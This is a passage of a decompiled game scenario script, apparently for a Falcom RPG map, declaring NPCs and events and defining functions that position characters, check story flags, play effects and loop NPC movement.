Unknown2 = 0, Unknown3 = 29, ChipIndex = 0x1D, NpcIndex = 0x181, InitFunctionIndex = 0, InitScenaIndex = 11, TalkFunctionIndex = 0, TalkScenaIndex = 13, ) DeclNpc( X = 0, Z = 0, Y = 0, Direction = 180, Unknown2 = 0, Unknown3 = 30, ChipIndex = 0x1E, NpcIndex = 0x181, InitFunctionIndex = 0, InitScenaIndex = 11, TalkFunctionIndex = 0, TalkScenaIndex = 12, ) DeclNpc( X = 0, Z = 0, Y = 0, Direction = 0, Unknown2 = 0, Unknown3 = 0, ChipIndex = 0x0, NpcIndex = 0x181, InitFunctionIndex = -1, InitScenaIndex = -1, TalkFunctionIndex = -1, TalkScenaIndex = -1, ) DeclNpc( X = -23030, Z = 8000, Y = 86970, Direction = 0, Unknown2 = 0, Unknown3 = 0, ChipIndex = 0x0, NpcIndex = 0xFF, InitFunctionIndex = -1, InitScenaIndex = -1, TalkFunctionIndex = -1, TalkScenaIndex = -1, ) DeclNpc( X = 28060, Z = 8000, Y = 58980, Direction = 0, Unknown2 = 0, Unknown3 = 0, ChipIndex = 0x0, NpcIndex = 0xFF, InitFunctionIndex = -1, InitScenaIndex = -1, TalkFunctionIndex = -1, TalkScenaIndex = -1, ) DeclEvent( X = -10910, Y = 7000, Z = 63300, Range = -12900, Unknown_10 = 0x2328, Unknown_14 = 0xD480, Unknown_18 = 0x0, Unknown_1C = 45, ) DeclEvent( X = -19010, Y = 7000, Z = 74090, Range = -26870, Unknown_10 = 0x2328, Unknown_14 = 0x12714, Unknown_18 = 0x0, Unknown_1C = 52, ) DeclEvent( X = -50430, Y = 24000, Z = 53980, Range = 3000, Unknown_10 = 0xBB8, Unknown_14 = 0x0, Unknown_18 = 0x40, Unknown_1C = 43, ) DeclEvent( X = -35690, Y = 9750, Z = 58940, Range = 1500, Unknown_10 = 0x7D0, Unknown_14 = 0x0, Unknown_18 = 0x41, Unknown_1C = 54, ) DeclEvent( X = -23010, Y = 7750, Z = 74850, Range = 1500, Unknown_10 = 0xBB8, Unknown_14 = 0x0, Unknown_18 = 0x41, Unknown_1C = 55, ) DeclActor( TriggerX = -50000, TriggerZ = 25000, TriggerY = 54010, TriggerRange = 800, ActorX = -50000, ActorZ = 26000, ActorY = 54010, Flags = 0x7C, TalkScenaIndex = 0, TalkFunctionIndex = 44, Unknown_22 = 0, ) ScpFunction( "Function_0_6A6", # 00, 0 "Function_1_E70", # 01, 1 "Function_2_10C0", # 02, 2 "Function_3_10F6", # 03, 3 "Function_4_127E", # 04, 4 "Function_5_12A2", # 05, 5 "Function_6_12C6", # 06, 6 "Function_7_12EA", # 07, 7 "Function_8_130E", # 08, 8 "Function_9_1332", # 09, 9 "Function_10_1356", # 0A, 10 "Function_11_137A", # 0B, 11 "Function_12_137B", # 0C, 12 "Function_13_13E0", # 0D, 13 "Function_14_1445", # 0E, 14 "Function_15_14AB", # 0F, 15 "Function_16_14F2", # 10, 16 "Function_17_154C", # 11, 17 "Function_18_15F0", # 12, 18 "Function_19_1676", # 13, 19 "Function_20_17F8", # 14, 20 "Function_21_18B0", # 15, 21 "Function_22_18D1", # 16, 22 "Function_23_1BD8", # 17, 23 "Function_24_1C7C", # 18, 24 "Function_25_1CEE", # 19, 25 "Function_26_1D4F", # 1A, 26 "Function_27_1DCC", # 1B, 27 "Function_28_1DF3", # 1C, 28 "Function_29_1E5B", # 1D, 29 "Function_30_2039", # 1E, 30 "Function_31_2938", # 1F, 31 "Function_32_2D9D", # 20, 32 "Function_33_2E46", # 21, 33 "Function_34_2F88", # 22, 34 "Function_35_2F8F", # 23, 35 "Function_36_2F96", # 24, 36 "Function_37_3042", # 25, 37 "Function_38_34EF", # 26, 38 "Function_39_35C8", # 27, 39 "Function_40_3615", # 28, 40 "Function_41_3890", # 29, 41 "Function_42_3D8A", # 2A, 42 "Function_43_4383", # 2B, 43 "Function_44_4399", # 2C, 44 "Function_45_4421", # 2D, 45 "Function_46_477F", # 2E, 46 "Function_47_4AD9", # 2F, 47 "Function_48_5917", # 30, 48 "Function_49_6273", # 31, 49 "Function_50_6778", # 32, 50 "Function_51_6ECF", # 33, 51 "Function_52_7169", # 34, 52 "Function_53_7383", # 35, 53 "Function_54_7BFF", # 36, 54 "Function_55_7C03", # 37, 55 ) def Function_0_6A6(): pass label("Function_0_6A6") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x7F, 2)), scpexpr(EXPR_END)), "loc_6B4") OP_A3(0x3FA) Event(0, 50) label("loc_6B4") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x7F, 3)), scpexpr(EXPR_END)), "loc_6CB") OP_4F(0x1, (scpexpr(EXPR_PUSH_LONG, 0x56), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) OP_A3(0x3FB) Event(0, 51) label("loc_6CB") Switch( (scpexpr(EXPR_PUSH_VALUE_INDEX, 0x0), scpexpr(EXPR_END)), (100, "loc_6E3"), (103, "loc_722"), (107, "loc_722"), (104, "loc_735"), (SWITCH_DEFAULT, "loc_73D"), ) label("loc_6E3") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA3, 3)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA3, 2)), scpexpr(EXPR_NEQUZ_I64), scpexpr(EXPR_END)), "loc_6F9") OP_A2(0x51B) Event(0, 46) Jump("loc_71F") label("loc_6F9") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA6, 6)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA6, 2)), scpexpr(EXPR_NEQUZ_I64), scpexpr(EXPR_END)), "loc_70C") Event(0, 48) Jump("loc_71F") label("loc_70C") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA6, 7)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA6, 6)), scpexpr(EXPR_NEQUZ_I64), scpexpr(EXPR_END)), "loc_71F") OP_A2(0x537) Event(0, 49) label("loc_71F") Jump("loc_73D") label("loc_722") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA5, 4)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA5, 3)), scpexpr(EXPR_NEQUZ_I64), scpexpr(EXPR_END)), "loc_732") Event(0, 47) label("loc_732") Jump("loc_73D") label("loc_735") OP_22(0xE, 0x0, 0x64) Jump("loc_73D") label("loc_73D") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xC0, 1)), scpexpr(EXPR_END)), "loc_79F") SetChrPos(0xD, -14600, 8000, 63040, 6) SetChrFlags(0xD, 0x10) SetChrPos(0x10, -15440, 8000, 63040, 3) SetChrFlags(0x10, 0x10) ClearChrFlags(0x18, 0x80) SetChrPos(0x18, -26340, 8000, 65489, 74) ClearChrFlags(0x19, 0x80) SetChrPos(0x19, -18800, 8000, 64430, 164) Jump("loc_E6F") label("loc_79F") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xAB, 5)), scpexpr(EXPR_END)), "loc_832") SetChrPos(0xD, -21460, 8000, 58770, 270) SetChrPos(0x10, -20870, 8000, 59640, 270) SetChrFlags(0x10, 0x10) ClearChrFlags(0xE, 0x80) SetChrPos(0xE, -23240, 8000, 57820, 45) SetChrFlags(0xE, 0x10) ClearChrFlags(0xC, 0x80) SetChrPos(0xC, -23310, 8000, 59800, 135) SetChrFlags(0xC, 0x10) ClearChrFlags(0x18, 0x80) SetChrPos(0x18, -26340, 8000, 65489, 74) ClearChrFlags(0x19, 0x80) SetChrPos(0x19, -18800, 8000, 64430, 164) Jump("loc_E6F") label("loc_832") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xAB, 1)), scpexpr(EXPR_END)), "loc_868") ClearChrFlags(0x18, 0x80) SetChrPos(0x18, -26340, 8000, 65489, 74) ClearChrFlags(0x19, 0x80) SetChrPos(0x19, -18800, 8000, 64430, 164) Jump("loc_E6F") label("loc_868") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xAA, 0)), scpexpr(EXPR_END)), "loc_89E") ClearChrFlags(0x18, 0x80) SetChrPos(0x18, -25190, 8000, 66790, 275) ClearChrFlags(0x19, 0x80) SetChrPos(0x19, -17150, 8000, 63800, 358) Jump("loc_E6F") label("loc_89E") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA6, 6)), scpexpr(EXPR_END)), "loc_98D") ClearChrFlags(0x11, 0x80) SetChrPos(0x11, -23800, 10000, 46930, 180) OP_43(0x11, 0x0, 0x0, 0x3) ClearChrFlags(0x12, 0x80) SetChrPos(0x12, -23170, 8000, 59080, 91) OP_43(0x12, 0x0, 0x0, 0x5) ClearChrFlags(0x13, 0x80) SetChrPos(0x13, -25200, 8000, 67400, 272) ClearChrFlags(0x14, 0x80) SetChrPos(0x14, -31870, 10000, 49240, 326) SetChrFlags(0x14, 0x10) ClearChrFlags(0x17, 0x80) SetChrPos(0x17, -33120, 10000, 50470, 135) SetChrFlags(0x17, 0x10) ClearChrFlags(0x18, 0x80) SetChrPos(0x18, -26340, 8000, 65489, 74) ClearChrFlags(0x19, 0x80) SetChrPos(0x19, -18800, 8000, 64430, 164) ClearChrFlags(0x1A, 0x80) SetChrPos(0x1A, -23610, 8000, 70240, 5) OP_43(0x1A, 0x0, 0x0, 0x6) ClearChrFlags(0x1E, 0x80) SetChrPos(0x1E, -48310, 22000, 49830, 163) Jump("loc_E6F") label("loc_98D") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA5, 0)), scpexpr(EXPR_END)), "loc_CF9") ClearChrFlags(0xA, 0x80) SetChrPos(0xA, -30660, 9000, 60810, 69) OP_43(0xA, 0x0, 0x0, 0x3) OP_51(0xA, 0x28, (scpexpr(EXPR_PUSH_LONG, 0x10), scpexpr(EXPR_PUSH_LONG, 0x8), scpexpr(EXPR_OR), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) ClearChrFlags(0x25, 0x80) SetChrPos(0x25, -24500, 8750, 51360, 18) OP_51(0x25, 0x28, (scpexpr(EXPR_PUSH_LONG, 0x10), scpexpr(EXPR_PUSH_LONG, 0x8), scpexpr(EXPR_OR), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) ClearChrFlags(0x11, 0x80) SetChrPos(0x11, -34110, 10000, 62990, 166) OP_43(0x11, 0x0, 0x0, 0x4) OP_51(0x11, 0x28, (scpexpr(EXPR_PUSH_LONG, 0x10), scpexpr(EXPR_PUSH_LONG, 0x8), scpexpr(EXPR_OR), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) ClearChrFlags(0x18, 0x80) SetChrPos(0x18, -26340, 8000, 65489, 74) ClearChrFlags(0x19, 0x80) SetChrPos(0x19, -18800, 8000, 64430, 164) OP_51(0x19, 0x28, (scpexpr(EXPR_PUSH_LONG, 0x10), scpexpr(EXPR_PUSH_LONG, 0x8), scpexpr(EXPR_OR), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) ClearChrFlags(0x1A, 0x80) SetChrPos(0x1A, -23610, 8000, 70240, 5) OP_43(0x1A, 0x0, 0x0, 0x6) OP_51(0x1A, 0x28, (scpexpr(EXPR_PUSH_LONG, 0x10), scpexpr(EXPR_PUSH_LONG, 0x8), scpexpr(EXPR_OR), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) ClearChrFlags(0x1B, 0x80) SetChrPos(0x1B, -27110, 8000, 60420, 69) SetChrFlags(0x1B, 0x10) OP_51(0x1B, 0x28, (scpexpr(EXPR_PUSH_LONG, 0x10), scpexpr(EXPR_PUSH_LONG, 0x8), scpexpr(EXPR_OR), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) ClearChrFlags(0x1C, 0x80) SetChrPos(0x1C, -27070, 8000, 59620, 359) SetChrFlags(0x1C, 0x10) OP_51(0x1C, 0x28, (scpexpr(EXPR_PUSH_LONG, 0x10), scpexpr(EXPR_PUSH_LONG, 0x8), scpexpr(EXPR_OR), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) ClearChrFlags(0xB, 0x80) SetChrPos(0xB, -33870, 10000, 57010, 292) OP_51(0xB, 0x28, (scpexpr(EXPR_PUSH_LONG, 0x10), scpexpr(EXPR_PUSH_LONG, 0x8), scpexpr(EXPR_OR), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) ClearChrFlags(0x1D, 0x80) SetChrPos(0x1D, -30810, 10000, 48800, 320) OP_43(0x1D, 0x0, 0x0, 0x7) OP_51(0x1D, 0x28, (scpexpr(EXPR_PUSH_LONG, 0x10), scpexpr(EXPR_PUSH_LONG, 0x8), scpexpr(EXPR_OR), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) ClearChrFlags(0x9, 0x80) SetChrPos(0x9, -32630, 10000, 58920, 255) OP_51(0x9, 0x28, (scpexpr(EXPR_PUSH_LONG, 0x10), scpexpr(EXPR_PUSH_LONG, 0x8), scpexpr(EXPR_OR), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) ClearChrFlags(0x1E, 0x80) SetChrPos(0x1E, -26600, 8000, 55790, 279) OP_51(0x1E, 0x28, (scpexpr(EXPR_PUSH_LONG, 0x10), scpexpr(EXPR_PUSH_LONG, 0x8), scpexpr(EXPR_OR), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) ClearChrFlags(0x1F, 0x80) SetChrPos(0x1F, -21730, 8000, 53410, 270) OP_43(0x1F, 0x0, 0x0, 0x8) OP_51(0x1F, 0x28, (scpexpr(EXPR_PUSH_LONG, 0x10), scpexpr(EXPR_PUSH_LONG, 0x8), scpexpr(EXPR_OR), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) ClearChrFlags(0x17, 0x80) SetChrPos(0x17, -29430, 8000, 57220, 85) SetChrFlags(0x17, 0x10) OP_51(0x17, 0x28, (scpexpr(EXPR_PUSH_LONG, 0x10), scpexpr(EXPR_PUSH_LONG, 0x8), scpexpr(EXPR_OR), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) ClearChrFlags(0x21, 0x80) SetChrPos(0x21, -22660, 8000, 61960, 82) OP_43(0x21, 0x0, 0x0, 0xA) OP_51(0x21, 0x28, (scpexpr(EXPR_PUSH_LONG, 0x10), scpexpr(EXPR_PUSH_LONG, 0x8), scpexpr(EXPR_OR), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) ClearChrFlags(0x22, 0x80) SetChrPos(0x22, -33530, 10000, 52430, 296) OP_51(0x22, 0x28, (scpexpr(EXPR_PUSH_LONG, 0x10), scpexpr(EXPR_PUSH_LONG, 0x8), scpexpr(EXPR_OR), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) ClearChrFlags(0x23, 0x80) SetChrPos(0x23, -33770, 10000, 51140, 330) OP_51(0x23, 0x28, (scpexpr(EXPR_PUSH_LONG, 0x10), scpexpr(EXPR_PUSH_LONG, 0x8), scpexpr(EXPR_OR), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) ClearChrFlags(0x24, 0x80) SetChrPos(0x24, -25860, 8000, 60310, 263) OP_51(0x24, 0x28, (scpexpr(EXPR_PUSH_LONG, 0x10), scpexpr(EXPR_PUSH_LONG, 0x8), scpexpr(EXPR_OR), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) ClearChrFlags(0x26, 0x80) SetChrPos(0x26, -21670, 8000, 66490, 242) OP_51(0x26, 0x28, (scpexpr(EXPR_PUSH_LONG, 0x10), scpexpr(EXPR_PUSH_LONG, 0x8), scpexpr(EXPR_OR), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) ClearChrFlags(0x20, 0x80) SetChrPos(0x20, -23200, 10000, 47850, 272) OP_43(0x20, 0x0, 0x0, 0x9) OP_51(0x20, 0x28, (scpexpr(EXPR_PUSH_LONG, 0x10), scpexpr(EXPR_PUSH_LONG, 0x8), scpexpr(EXPR_OR), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) ClearChrFlags(0xF, 0x80) SetChrPos(0xF, -30230, 10000, 47900, 298) OP_51(0xF, 0x28, (scpexpr(EXPR_PUSH_LONG, 0x10), scpexpr(EXPR_PUSH_LONG, 0x8), scpexpr(EXPR_OR), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) Jump("loc_E6F") label("loc_CF9") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA3, 2)), scpexpr(EXPR_END)), "loc_D4C") ClearChrFlags(0x18, 0x80) SetChrPos(0x18, -26340, 8000, 65489, 74) ClearChrFlags(0x19, 0x80) SetChrPos(0x19, -18800, 8000, 64430, 164) ClearChrFlags(0x1A, 0x80) SetChrPos(0x1A, -23610, 8000, 70240, 5) OP_43(0x1A, 0x0, 0x0, 0x6) Jump("loc_E6F") label("loc_D4C") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA2, 3)), scpexpr(EXPR_END)), "loc_D82") ClearChrFlags(0x18, 0x80) SetChrPos(0x18, -26340, 8000, 65489, 74) ClearChrFlags(0x19, 0x80) SetChrPos(0x19, -18800, 8000, 64430, 164) Jump("loc_E6F") label("loc_D82") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA2, 1)), scpexpr(EXPR_END)), "loc_DB8") ClearChrFlags(0x18, 0x80) SetChrPos(0x18, -26340, 8000, 65489, 74) ClearChrFlags(0x19, 0x80) SetChrPos(0x19, -18800, 8000, 64430, 164) Jump("loc_E6F") label("loc_DB8") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA1, 6)), scpexpr(EXPR_END)), "loc_E10") SetChrPos(0xD, -14600, 8000, 63040, 6) SetChrPos(0x10, -15440, 8000, 63040, 3) ClearChrFlags(0x18, 0x80) SetChrPos(0x18, -26340, 8000, 65489, 74) ClearChrFlags(0x19, 0x80) SetChrPos(0x19, -18800, 8000, 64430, 164) Jump("loc_E6F") label("loc_E10") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA0, 2)), scpexpr(EXPR_END)), "loc_E6F") SetChrPos(0xD, -14600, 8000, 63040, 6) SetChrFlags(0xD, 0x10) SetChrPos(0x10, -15440, 8000, 63040, 3) SetChrFlags(0x10, 0x10) ClearChrFlags(0x18, 0x80) SetChrPos(0x18, -26340, 8000, 65489, 74) ClearChrFlags(0x19, 0x80) SetChrPos(0x19, -18800, 8000, 64430, 164) label("loc_E6F") Return() # Function_0_6A6 end def Function_1_E70(): pass label("Function_1_E70") OP_16(0x2, 0xFA0, 0xFFFDB228, 0xFFFEF278, 0x30052) Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA7, 2)), scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xAB, 0)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_NEQUZ_I64), scpexpr(EXPR_END)), "loc_E9A") OP_B1("t3101_y") Jump("loc_EA3") label("loc_E9A") OP_B1("t3101_n") label("loc_EA3") OP_6F(0x5, 40) OP_70(0x5, 0x0) Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA7, 2)), scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xAB, 0)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_NEQUZ_I64), scpexpr(EXPR_END)), "loc_EC9") OP_4F(0x1, (scpexpr(EXPR_PUSH_LONG, 0x54), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) Jump("loc_EF6") label("loc_EC9") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA6, 2)), scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA6, 6)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_NEQUZ_I64), scpexpr(EXPR_END)), "loc_EE1") OP_4F(0x1, (scpexpr(EXPR_PUSH_LONG, 0x52), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) Jump("loc_EF6") label("loc_EE1") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA5, 4)), scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA6, 2)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_NEQUZ_I64), scpexpr(EXPR_END)), "loc_EF6") OP_4F(0x1, (scpexpr(EXPR_PUSH_LONG, 0x51), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) label("loc_EF6") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA5, 4)), scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA6, 6)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_NEQUZ_I64), scpexpr(EXPR_END)), "loc_F0A") OP_72(0x3, 0x10) Jump("loc_F0E") label("loc_F0A") OP_64(0x0, 0x1) label("loc_F0E") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA5, 3)), scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA6, 6)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_NEQUZ_I64), scpexpr(EXPR_END)), "loc_109C") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA6, 2)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_END)), "loc_1090") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA8, 7)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA9, 0)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_OR), scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA9, 1)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_OR), scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA9, 2)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_OR), scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA9, 3)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_OR), scpexpr(EXPR_END)), "loc_1090") LoadEffect(0x0, "map\\\\mp011_00.eff") PlayEffect(0x0, 0xFF, 0xFF, -49690, 25000, 54030, 0, 0, 0, 1000, 1000, 1000, 0xFF, 0, 0, 0, 1000) PlayEffect(0x0, 0xFF, 0xFF, -39390, 22000, 56200, 0, 0, 0, 1000, 1000, 1000, 0xFF, 0, 0, 0, 1000) PlayEffect(0x0, 0xFF, 0xFF, -39390, 22000, 61640, 0, 0, 0, 500, 500, 500, 0xFF, 0, 0, 0, 1000) PlayEffect(0x0, 0xFF, 0xFF, -39850, 19620, 65980, 0, 0, 0, 500, 500, 500, 0xFF, 0, 0, 0, 1000) PlayEffect(0x0, 0xFF, 0xFF, -39770, 17290, 50070, 0, 0, 0, 500, 500, 500, 0xFF, 0, 0, 0, 1000) PlayEffect(0x0, 0xFF, 0xFF, -37130, 10000, 58950, 0, 0, 0, 1000, 1000, 1000, 0xFF, 0, 0, 0, 1000) label("loc_1090") OP_72(0x0, 0x10) OP_6F(0x0, 60) label("loc_109C") SoundDistance(0xA0, 0xFFFFEDF4, 0x14C8, 0xE790, 0x2710, 0x7530, 0x64, 0x0) OP_43(0x27, 0x0, 0x0, 0x2) Return() # Function_1_E70 end def Function_2_10C0(): pass label("Function_2_10C0") OP_72(0x5, 0x20) OP_72(0x4, 0x20) label("loc_10CA") Jc((scpexpr(EXPR_PUSH_LONG, 0x1), scpexpr(EXPR_END)), "loc_10F5") OP_6F(0x5, 40) OP_70(0x5, 0x0) OP_6F(0x4, 0) OP_70(0x4, 0x28) OP_73(0x5) Jump("loc_10CA") label("loc_10F5") Return() # Function_2_10C0 end def Function_3_10F6(): pass label("Function_3_10F6") OP_51(0xFE, 0x28, (scpexpr(EXPR_PUSH_LONG, 0x8), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) RunExpression(0x1, (scpexpr(EXPR_RAND), scpexpr(EXPR_PUSH_LONG, 0xE), scpexpr(EXPR_IMOD), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) Jc((scpexpr(EXPR_GET_RESULT, 0x1), scpexpr(EXPR_PUSH_LONG, 0x0), scpexpr(EXPR_EQU), scpexpr(EXPR_END)), "loc_1126") OP_99(0xFE, 0x0, 0x7, 0x672) Jump("loc_1268") label("loc_1126") Jc((scpexpr(EXPR_GET_RESULT, 0x1), scpexpr(EXPR_PUSH_LONG, 0x1), scpexpr(EXPR_EQU), scpexpr(EXPR_END)), "loc_113F") OP_99(0xFE, 0x1, 0x7, 0x640) Jump("loc_1268") label("loc_113F") Jc((scpexpr(EXPR_GET_RESULT, 0x1), scpexpr(EXPR_PUSH_LONG, 0x2), scpexpr(EXPR_EQU), scpexpr(EXPR_END)), "loc_1158") OP_99(0xFE, 0x2, 0x7, 0x60E) Jump("loc_1268") label("loc_1158") Jc((scpexpr(EXPR_GET_RESULT, 0x1), scpexpr(EXPR_PUSH_LONG, 0x3), scpexpr(EXPR_EQU), scpexpr(EXPR_END)), "loc_1171") OP_99(0xFE, 0x3, 0x7, 0x5DC) Jump("loc_1268") label("loc_1171") Jc((scpexpr(EXPR_GET_RESULT, 0x1), scpexpr(EXPR_PUSH_LONG, 0x4), scpexpr(EXPR_EQU), scpexpr(EXPR_END)), "loc_118A") OP_99(0xFE, 0x4, 0x7, 0x5AA) Jump("loc_1268") label("loc_118A") Jc((scpexpr(EXPR_GET_RESULT, 0x1), scpexpr(EXPR_PUSH_LONG, 0x5), scpexpr(EXPR_EQU), scpexpr(EXPR_END)), "loc_11A3") OP_99(0xFE, 0x5, 0x7, 0x578) Jump("loc_1268") label("loc_11A3") Jc((scpexpr(EXPR_GET_RESULT, 0x1), scpexpr(EXPR_PUSH_LONG, 0x6), scpexpr(EXPR_EQU), scpexpr(EXPR_END)), "loc_11BC") OP_99(0xFE, 0x6, 0x7, 0x546) Jump("loc_1268") label("loc_11BC") Jc((scpexpr(EXPR_GET_RESULT, 0x1), scpexpr(EXPR_PUSH_LONG, 0x7), scpexpr(EXPR_EQU), scpexpr(EXPR_END)), "loc_11D5") OP_99(0xFE, 0x0, 0x7, 0x677) Jump("loc_1268") label("loc_11D5") Jc((scpexpr(EXPR_GET_RESULT, 0x1), scpexpr(EXPR_PUSH_LONG, 0x8), scpexpr(EXPR_EQU), scpexpr(EXPR_END)), "loc_11EE") OP_99(0xFE, 0x1, 0x7, 0x645) Jump("loc_1268") label("loc_11EE") Jc((scpexpr(EXPR_GET_RESULT, 0x1), scpexpr(EXPR_PUSH_LONG, 0x9), scpexpr(EXPR_EQU), scpexpr(EXPR_END)), "loc_1207") OP_99(0xFE, 0x2, 0x7, 0x613) Jump("loc_1268") label("loc_1207") Jc((scpexpr(EXPR_GET_RESULT, 0x1), scpexpr(EXPR_PUSH_LONG, 0xA), scpexpr(EXPR_EQU), scpexpr(EXPR_END)), "loc_1220") OP_99(0xFE, 0x3, 0x7, 0x5E1) Jump("loc_1268") label("loc_1220") Jc((scpexpr(EXPR_GET_RESULT, 0x1), scpexpr(EXPR_PUSH_LONG, 0xB), scpexpr(EXPR_EQU), scpexpr(EXPR_END)), "loc_1239") OP_99(0xFE, 0x4, 0x7, 0x5AF) Jump("loc_1268") label("loc_1239") Jc((scpexpr(EXPR_GET_RESULT, 0x1), scpexpr(EXPR_PUSH_LONG, 0xC), scpexpr(EXPR_EQU), scpexpr(EXPR_END)), "loc_1252") OP_99(0xFE, 0x5, 0x7, 0x57D) Jump("loc_1268") label("loc_1252") Jc((scpexpr(EXPR_GET_RESULT, 0x1), scpexpr(EXPR_PUSH_LONG, 0xD), scpexpr(EXPR_EQU), scpexpr(EXPR_END)), "loc_1268") OP_99(0xFE, 0x6, 0x7, 0x54B) label("loc_1268") Jc((scpexpr(EXPR_PUSH_LONG, 0x1), scpexpr(EXPR_END)), "loc_127D") OP_99(0xFE, 0x0, 0x7, 0x5DC) Jump("loc_1268") label("loc_127D") Return() # Function_3_10F6 end def Function_4_127E(): pass label("Function_4_127E") Jc((scpexpr(EXPR_PUSH_LONG, 0x1), scpexpr(EXPR_END)), "loc_12A1") OP_8D(0xFE, -35270, 61360, -33040, 64150, 3000) Jump("Function_4_127E") label("loc_12A1") Return() # Function_4_127E end def Function_5_12A2(): pass label("Function_5_12A2") Jc((scpexpr(EXPR_PUSH_LONG, 0x1), scpexpr(EXPR_END)), "loc_12C5") OP_8D(0xFE, -26390, 55950, -19770, 61950, 3000) Jump("Function_5_12A2") label("loc_12C5") Return() # Function_5_12A2 end def Function_6_12C6(): pass label("Function_6_12C6") Jc((scpexpr(EXPR_PUSH_LONG, 0x1), scpexpr(EXPR_END)), "loc_12E9") OP_8D(0xFE, -25190, 68440, -20920, 71850, 3000) Jump("Function_6_12C6") label("loc_12E9") Return() # Function_6_12C6 end def Function_7_12EA(): pass label("Function_7_12EA") Jc((scpexpr(EXPR_PUSH_LONG, 0x1), scpexpr(EXPR_END)), "loc_130D") OP_8D(0xFE, -32689, 46510, -30620, 50700, 3000) Jump("Function_7_12EA") label("loc_130D") Return() # Function_7_12EA end def Function_8_130E(): pass label("Function_8_130E") Jc((scpexpr(EXPR_PUSH_LONG, 0x1), scpexpr(EXPR_END)), "loc_1331") OP_8D(0xFE, -25190, 54660, -20780, 60740, 3000) Jump("Function_8_130E") label("loc_1331") Return() # 